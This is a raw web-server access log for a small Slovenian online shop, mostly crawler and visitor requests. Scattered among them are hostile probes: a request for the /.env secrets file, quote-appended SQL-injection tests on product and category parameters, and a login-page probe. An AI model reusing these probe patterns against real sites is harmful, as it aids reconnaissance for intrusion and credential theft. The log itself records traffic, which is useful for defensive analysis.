5.255.231.78 - - [02/Oct/2024:12:11:51 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
213.180.203.84 - - [02/Oct/2024:12:11:51 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.66.44 - - [02/Oct/2024:12:28:43 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.180.203.186 - - [02/Oct/2024:12:52:43 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.213.82 - - [02/Oct/2024:12:52:43 +0200] "GET /slike/jonseredv.jpg HTTP/1.1" 200 10649 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
35.203.210.197 - - [02/Oct/2024:13:56:08 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
41.37.218.201 - - [02/Oct/2024:14:07:49 +0200] "GET /" 400 474 "-" "-"
66.249.66.42 - - [02/Oct/2024:14:49:04 +0200] "GET /info.php?sifra=16.010&skupina=34 HTTP/1.1" 200 17884 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:14:54:04 +0200] "GET /info.php?sifra=13.078&skupina=34 HTTP/1.1" 200 17901 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:14:55:06 +0200] "GET /info.php?sifra=16.010&skupina=34 HTTP/1.1" 200 17884 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.66.42 - - [02/Oct/2024:15:25:01 +0200] "GET /info.php?sifra=kos002&skupina=133 HTTP/1.1" 200 17456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:16:30:36 +0200] "GET /info.php?sifra=2RTO82&skupina=31 HTTP/1.1" 200 17770 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:16:41:01 +0200] "GET /info.php?sifra=28515&skupina=82 HTTP/1.1" 200 19129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.94.146.48 - - [02/Oct/2024:16:44:05 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.146.48 - - [02/Oct/2024:16:44:10 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.48 - - [02/Oct/2024:16:44:10 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.48 - - [02/Oct/2024:16:44:10 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /skupine.php?skupina=86&stran=2 HTTP/1.1" 200 27701 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /metra_logo_01a.gif HTTP/1.1" 200 7126 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /style.css HTTP/1.1" 200 11488 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /slike2/vozicek_m2.gif HTTP/1.1" 200 549 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /slike/hdem_100HW_m.gif HTTP/1.1" 200 2850 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /kvadratek.gif HTTP/1.1" 200 99 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /dodaj_v_vozicek.gif HTTP/1.1" 200 1135 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /slike/160.gif HTTP/1.1" 200 2333 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /slike/140.gif HTTP/1.1" 200 2573 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /images/celica_desno.gif HTTP/1.1" 404 - "http://212.44.99.48/style.css" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /favicon.ico HTTP/1.1" 404 - "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /slike/ HTTP/1.1" 200 40026 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:46 +0200] "GET /skupine.php?skupina=86&stran=2 HTTP/1.1" 200 27701 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:46 +0200] "GET /slike/ HTTP/1.1" 200 60773 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
66.249.66.42 - - [02/Oct/2024:18:00:36 +0200] "GET /kontakt.php HTTP/1.1" 200 16457 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:18:11:48 +0200] "GET /skupine.php?skupina=82&stran=4 HTTP/1.1" 200 27543 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:18:36:34 +0200] "GET /skupine.php?skupina=31 HTTP/1.1" 200 25701 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /skupine.php?skupina=100&stran=3 HTTP/1.1" 200 23317 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /style.css HTTP/1.1" 200 11488 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /metra_logo_01a.gif HTTP/1.1" 200 7126 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /kvadratek.gif HTTP/1.1" 200 99 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /slike2/vozicek_m2.gif HTTP/1.1" 200 549 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /slike/50455_m.jpg HTTP/1.1" 200 3761 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /slike/Slika20012-1m.jpg HTTP/1.1" 200 3837 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /dodaj_v_vozicek.gif HTTP/1.1" 200 1135 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /slike/etrgovina2010%20004.jpg HTTP/1.1" 200 9599 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /slike/IMG_2249-3.JPG HTTP/1.1" 200 4389 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /images/celica_desno.gif HTTP/1.1" 404 - "http://212.44.99.48/style.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /favicon.ico HTTP/1.1" 404 - "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
66.249.66.43 - - [02/Oct/2024:19:30:36 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:19:30:36 +0200] "GET /info.php?sifra=15.042&skupina=34 HTTP/1.1" 200 17770 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:19:41:49 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:19:41:49 +0200] "GET /info.php?sifra=043899&skupina=131 HTTP/1.1" 200 17213 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
159.203.25.199 - - [02/Oct/2024:19:59:51 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 Keydrop"
159.203.25.199 - - [02/Oct/2024:19:59:51 +0200] "GET /" 400 474 "-" "-"
23.94.126.146 - - [02/Oct/2024:20:08:24 +0200] "GET /skupine.php?skupina=100%27&stran=3 HTTP/1.1" 200 13089 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
23.94.126.146 - - [02/Oct/2024:20:08:24 +0200] "GET /skupine.php?skupina=100&stran=3%27 HTTP/1.1" 200 23317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
92.249.48.232 - - [02/Oct/2024:20:14:49 +0200] "GET / HTTP/1.1" 400 226 "-" "curl/7.68.0"
207.46.13.230 - - [02/Oct/2024:20:31:53 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.22 - - [02/Oct/2024:20:31:55 +0200] "GET /kritine-etrg-01.jpg HTTP/1.1" 200 110374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
4.237.68.225 - - [02/Oct/2024:20:53:53 +0200] "GET /info.php?sifra=HDEM135%27&skupina=82 HTTP/1.1" 200 18635 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
4.237.68.225 - - [02/Oct/2024:20:53:53 +0200] "GET /info.php?sifra=HDEM135&skupina=82%27 HTTP/1.1" 200 17740 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
66.249.66.42 - - [02/Oct/2024:21:08:48 +0200] "GET /skupine.php?skupina=87&stran=2 HTTP/1.1" 200 26894 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.175.6.252 - - [02/Oct/2024:21:43:19 +0200] "GET /image/lgbg.jpg HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:23 +0200] "GET / HTTP/1.1" 200 20819 "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:28 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:32 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:35 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:37 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:45 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:47 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:54 +0200] "GET /login.rsp HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:56 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
198.235.24.64 - - [02/Oct/2024:21:46:29 +0200] "GET / HTTP/1.0" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.43 - - [02/Oct/2024:22:17:38 +0200] "GET /info.php?sifra=56151&skupina=100 HTTP/1.1" 200 17549 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:22:37:23 +0200] "GET /info.php?sifra=50151&skupina=100 HTTP/1.1" 200 17702 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:22:37:24 +0200] "GET /info.php?sifra=50051&skupina=100 HTTP/1.1" 200 17603 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:22:37:24 +0200] "GET /skupine.php?skupina=100&stran=3 HTTP/1.1" 200 23317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:22:38:24 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:22:38:25 +0200] "GET /info.php?sifra=655139&skupina=54 HTTP/1.1" 200 17311 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:22:43:49 +0200] "GET /info.php?sifra=95DNS&skupina=0 HTTP/1.1" 200 17022 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:22:44:25 +0200] "GET /info.php?sifra=559510&skupina=100 HTTP/1.1" 200 17619 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.128.54.126 - - [02/Oct/2024:22:46:17 +0200] "GET /" 400 474 "-" "-"
178.128.54.126 - - [02/Oct/2024:22:46:18 +0200] "GET /cdn-cgi/trace HTTP/1.1" 404 - "-" "Mozilla/5.0"
178.128.54.126 - - [02/Oct/2024:22:46:22 +0200] "\x16\x03\x01\x01\v\x01" 400 226 "-" "-"
66.249.66.44 - - [02/Oct/2024:22:46:29 +0200] "GET /info.php?sifra=50451&skupina=100 HTTP/1.1" 200 17660 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:22:50:29 +0200] "GET /info.php?sifra=6202&skupina=54 HTTP/1.1" 200 17351 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:22:50:30 +0200] "GET /info.php?sifra=1010690&skupina=54 HTTP/1.1" 200 17316 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:22:53:26 +0200] "GET /info.php?sifra=HDEM125&skupina=82 HTTP/1.1" 200 19303 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:23:00:32 +0200] "GET /info.php?sifra=111.15.01&skupina=54 HTTP/1.1" 200 17409 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:23:00:33 +0200] "GET /skupine.php?skupina=55 HTTP/1.1" 200 22068 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:23:00:33 +0200] "GET /info.php?sifra=KE40&skupina=136 HTTP/1.1" 200 17065 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:23:08:35 +0200] "GET /info.php?sifra=K202&skupina=136 HTTP/1.1" 200 17006 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:23:08:36 +0200] "GET /skupine.php?skupina=136&stran=1 HTTP/1.1" 200 24920 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:23:09:36 +0200] "GET /skupine.php?skupina=136&stran=2 HTTP/1.1" 200 22689 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:23:13:37 +0200] "GET /info.php?sifra=95SNS&skupina=136 HTTP/1.1" 200 17042 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:23:13:38 +0200] "GET /info.php?sifra=95DNS&skupina=136 HTTP/1.1" 200 17045 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.36 - - [02/Oct/2024:23:16:51 +0200] "GET /metra_logo_01a.gif HTTP/1.1" 200 7126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.66.42 - - [02/Oct/2024:23:21:38 +0200] "GET /skupine.php?skupina=42&stran=1 HTTP/1.1" 200 26562 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:23:23:39 +0200] "GET /info.php?sifra=7212&skupina=42 HTTP/1.1" 200 18602 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:23:33:39 +0200] "GET /skupine.php?skupina=42&stran=2 HTTP/1.1" 200 26392 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:23:38:39 +0200] "GET /skupine.php?skupina=42&stran=3 HTTP/1.1" 200 26436 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
111.249.168.230 - - [02/Oct/2024:00:13:49 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
